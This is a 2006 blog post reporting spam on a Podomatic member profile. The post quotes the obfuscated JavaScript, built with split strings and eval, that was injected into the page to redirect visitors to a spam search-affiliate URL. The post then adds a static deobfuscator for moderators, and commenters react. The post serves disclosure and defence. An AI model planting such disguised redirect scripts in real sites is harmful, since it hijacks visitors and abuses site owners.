Thursday, October 05, 2006

Podomatic Vulnerability Enables Spammer Redirects

Here's another instance in the rash of reported vulnerabilities where member registration pages are being spammed. Never heard of Podomatic before, but it appears the spammers sure have, and some nitwit registered as a member called Valium to do his spamming.

The link to the member's site is:

http://www.podomatic.com/profile/member/valium

The JavaScript redirect code appears to be this shit embedded in the member page:

<script>
var mbht872 = 'on=';
var bikmr354 = 'qiqyi199';
var zlh171 ='ment';
var k97='.lo';
var ydxglyjedai737='ti';
var bmmp211='docu';
var mzcra833='http://drsearch.net/search.php?aff=15313&q=';
var ertmj632='valium';
var qiqyi199 = 'ca';
var lflx482='"';
if(bikmr354 = 'qiqyi199')eval(bmmp211+zlh171+k97+qiqyi199+ydxglyjedai737+mbht872+lflx482+mzcra833+ertmj632+lflx482);
</script>

Just goes to show you that if you don't secure your sites some spammer will abuse them, but people just don't listen.
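
To see what that script does without running it, the string fragments can be resolved statically. The following is an added example, not code from the original post or from Podomatic; the function names deobfuscate and redirectTarget are made up for illustration, and the sample input is the script quoted above.

```javascript
// Added example: resolve the split-string obfuscation statically,
// without ever passing the spammer's code to eval().
const sample = `
var mbht872 = 'on=';
var bikmr354 = 'qiqyi199';
var zlh171 ='ment';
var k97='.lo';
var ydxglyjedai737='ti';
var bmmp211='docu';
var mzcra833='http://drsearch.net/search.php?aff=15313&q=';
var ertmj632='valium';
var qiqyi199 = 'ca';
var lflx482='"';
if(bikmr354 = 'qiqyi199')eval(bmmp211+zlh171+k97+qiqyi199+ydxglyjedai737+mbht872+lflx482+mzcra833+ertmj632+lflx482);
`;

// Returns the string that would have been handed to eval(), or null
// when the source contains no eval() of concatenated identifiers.
function deobfuscate(src) {
  const vars = {};
  // Collect every `var name = 'literal';` assignment.
  const decl = /var\s+(\w+)\s*=\s*'([^']*)'\s*;/g;
  let m;
  while ((m = decl.exec(src)) !== null) vars[m[1]] = m[2];
  // Locate eval(a+b+c...) and substitute each identifier by its literal.
  const call = /eval\(\s*([\w\s+]+?)\s*\)/.exec(src);
  if (!call) return null;
  return call[1].split('+').map((part) => {
    const name = part.trim();
    if (!(name in vars)) throw new Error('unresolved identifier: ' + name);
    return vars[name];
  }).join('');
}

// Extracts the destination URL when the resolved code is a plain
// location assignment; returns null for anything else.
function redirectTarget(code) {
  const m = /^(?:document|window)\.location(?:\.href)?\s*=\s*"([^"]*)"$/.exec(code);
  return m ? m[1] : null;
}

console.log(deobfuscate(sample));
console.log(redirectTarget(deobfuscate(sample)));
```

The same two functions can be pointed at member-supplied profile HTML during moderation to flag pages whose scripts resolve to an off-site redirect.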

3 comments:

Anonymous said...

Thanks for pointing this out, I've closed the hole.

--b

Anonymous said...

Maybe it's more that people don't care than that they don't listen. Not everyone is obsessed with making the internet a perfect place... some people deal with issues in the real world.

IncrediBILL said...

Well, that's a nice theory as spoken by someone that sounds like a spammer, but the post above yours was from someone at Podomatic that fixed the issue.

You just keep being delusional as web spam is getting the boot.